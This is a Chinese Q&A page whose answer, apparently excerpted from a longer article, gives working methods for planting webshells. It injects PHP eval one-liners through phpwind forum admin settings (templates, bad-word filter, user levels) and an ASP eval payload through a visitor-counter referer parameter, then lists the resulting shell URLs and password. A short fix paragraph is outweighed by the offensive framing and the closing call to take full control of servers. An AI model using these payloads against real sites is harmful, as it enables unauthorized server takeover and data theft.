Question

怎么用MySql备份得到WebShell

怎么用MySql备份得到WebShell

Answer 1

九、phpwind论坛从后台到webshell的三种方式

　　方式1 模板法

　　进入后台， 风格模版设置，在随便一行写代码，记住，这代码必须顶着左边行写，代码前面不可以有任何字符。

EOT;
eval($a);
print ＜＜＜EOT

　　而后得到一个shell为http://网站/bbs/index.php。

　　方始2 脏话过滤法

　　进入安全管理 ◇ 不良词语过滤。新增不良词语写 a’]=’aa’;eval($_POST[’a’]);//

　　替换为那里可以随意写，而后得到一个shell地址为http://网站/bbs/data/bbscache/wordsfb.php。

　　方式3 用户等级管理

　　新建立会员组，头衔你可以随便写，但是千万不要写单双引号特殊符号，升级图片号写a’;eval($_POST[’a’]);// ，升级点数依然可以随意写。而后得到一个shell地址为http://网站/bbs/data/bbscache/level.php。

　　以上三种方式得到webshellr的密码是a,为lanker的一句话后门服务端。

　　十、也可以利用网站访问计数系统记录来获得webshell

　　最明显的就是某私服程序内的阿江计数程序，可以通过http://网站/stat.asp?style=text&referer= 代码内容&screenwidth=1024直接提交，即可把代码内容直接插入到计数系统的数据库中，而此系统默认数据库为count#.asa，我们可以通过http://网站/count%23.asa访问得到webshell，由于阿江计数程序过滤了%和+，将最小马改成＜SCRIPT RUNAT=SERVER LANGUAGE=vbSCRIPT＞eval(Request("1"))＜/SCRIPT＞替换代码内容处提交，然后用lake2的eval客户端来提交，值得一提的是如果进到计数后台，可以清理某时某刻的数据，一旦插入asp木马失败，可以清理数据库再次操作。

　　解决方案

　　由于本文涉及的代码版本很多，所以不可能提供一个完美的解决方案。有能力者可以针对本文提到的漏洞文件进行适当修补，若漏洞文件不影响系统使用也可删除此文件。大家如果不会修补，可以到相关官方网站下载最新补丁进行修复更新。同时也请大家能时刻关注各大安全网络发布的最新公告，若自己发现相关漏洞也可及时通知官方网站。

　　后记

　　其实，从后台得到webshell的技巧应该还有很多的，关键是要看大家怎么灵活运用、触类旁通，希望本文的方法能起到抛砖引玉的作用。各位加油吧，让我们将服务器控制到底